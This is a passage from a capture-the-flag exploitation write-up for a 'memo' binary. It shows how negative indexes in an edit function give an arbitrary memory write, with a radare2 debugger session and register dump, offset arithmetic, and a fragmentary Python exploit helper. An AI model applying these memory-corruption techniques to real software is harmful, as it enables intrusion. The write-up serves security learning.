Putting it together, we can realize that an arbitrary memory write exists. The edit function allows you to edit the last written memo. It utilizes the global index value to track what the last written index was, and allows you to use negative indexes. What this means is, we can edit a message that never existed, and we can control the location that is being written to, thus an arbitrary write.
Step one is we want to be able to set the global index variable without causing the program to exit. Recall that if we try a negative index, it caused the program to spit out an error. However, look closely at that function:
We get the "Index too large" error, but there's a check before that. The very first block has a check to see if the index is in use before checking if the index is too large. This means if we can select a negative index and ensure that it is non-zero, we can set our index to it. Using a debugger, we can take a peek at where this is.
[0x7f81fb542cc0]> db 0x400C8E
Selecting and continuing: 121375
What's user name: AAAAAAAAAAAAAAAAA
Do you wanna set password? (y/n) y
Password must be set to 32 digits or less.
Done! have a good day AAAAAAAAAAAAAAAAA
1. Leave message on memo
2. Edit message last memo
3. View memo
4. Delete memo
5. Change password
hit breakpoint at: 400c8e
rax 0x0000000000602a30 (.bss) (/home/user/bkp/pwn/memo/memo) rax program ascii R W 0xa41 (A
rbx 0x0000000000000000 r8
rcx 0x00000000ffffffda rcx
rdx 0x0000000000000001 (.comment) rdx
r8 0x0000000000000000 r8
r9 0x1999999999999999 r9
r10 0x0000000000000000 r8
r11 0x00007f81fb2efa00 (/lib/x86_64-linux-gnu/libc-2.23.so) r11 library R X 'add al, byte [rax]' 'libc-2.23.so' (𠀂𠀂𠀂𠀂𠀂𠀂𠀂𠀂𠀂𠀂𠀂𠀂𠀂�����������������翰< 翿翆��p喪�k�喪�翿翆��p喪�喪�喪�翿翆翆0喪�翿翆翆0喪 翿< 翿翆�喪�唁)
r12 0x00000000004008a0 (.text) (/home/user/bkp/pwn/memo/memo) r12 entry0 program R X 'xor ebp, ebp' 'memo'
r13 0x00007ffe3a0ffe40 r13 stack R W 0x1 --> (.comment) rdx
r14 0x0000000000000000 r8
r15 0x0000000000000000 r8
rsi 0x0000000000000008 (.comment) rsi
rdi 0x00007ffe3a0ffcf2 rdi stack R W 0xc4a00000000000a
rsp 0x00007ffe3a0ffd10 rsp stack R W 0x0 --> r8
rbp 0x00007ffe3a0ffd20 rbp stack R W 0x7ffe3a0ffd60 --> stack R W 0x401200 --> (.text) (/home/user/bkp/pwn/memo/memo) fcn.00401200 fcn.00401200 program R X 'push r15' 'memo'
rip 0x0000000000400c8e (.text) (/home/user/bkp/pwn/memo/memo) rip fcn.00400c52 program R X 'mov rax, qword [rax]' 'memo'
cs 0x0000000000000033 (.comment) ascii
rflags C1PI rflags
orax 0xffffffffffffffff orax
ss 0x000000000000002b (.comment) ascii
fs_base 0x00007f81fb736700 (unk1) R W 0x7f81fb736700
gs_base 0x0000000000000000 r8
ds 0x0000000000000000 r8
es 0x0000000000000000 r8
fs 0x0000000000000000 r8
gs 0x0000000000000000 r8
Note rax. We can see that when i use the index -8 (chosen mostly arbitrarily), the leave message function looks for the index 16 bytes into the username. Since I didn't want to bother moving offsets around, i just stuck with this index for the rest. However, if you wanted to move it you certainly could. In fact, -10 might be a better choice as it puts the index right at the beginning of your username global.
Now that we can set the global index variable, we can use that to control a write using the edit function. However, one things that happen in the edit function is it checks the memo length array for how much to read.
We can calculate where this value will end up fairly easily.
hex(0x602A60 - (8*4)) == 0x602a40
So we know that 0x602a40 is actually the start of our password buffer. We now know where we must store a size value. These two pieces combined give us our arbitrary memory write. In python, I wrote it up as follows:
# Bad chars
if "\x0a" in p64(addr) or "\x0a" in p32(size) or "\x0a" in value:
new_username = "A"*0x10 + p64(addr) + "\n" # Write to addr
new_password = p32(size) + "\x00" # Number of bytes to read
# Setup our pointers
if not change_password(password,new_username,new_password):
# Remember our pass
password = new_password
if not edit_message(value + "\n"): # Write to memory address
Note that I have written helper functions (such as change_password) that just wrap those binary calls. I'm not going to go into those as they are fairly strait forward.
To use this, we need to be able to remove some randomization of the binary first. That means, in this case, a memory leak.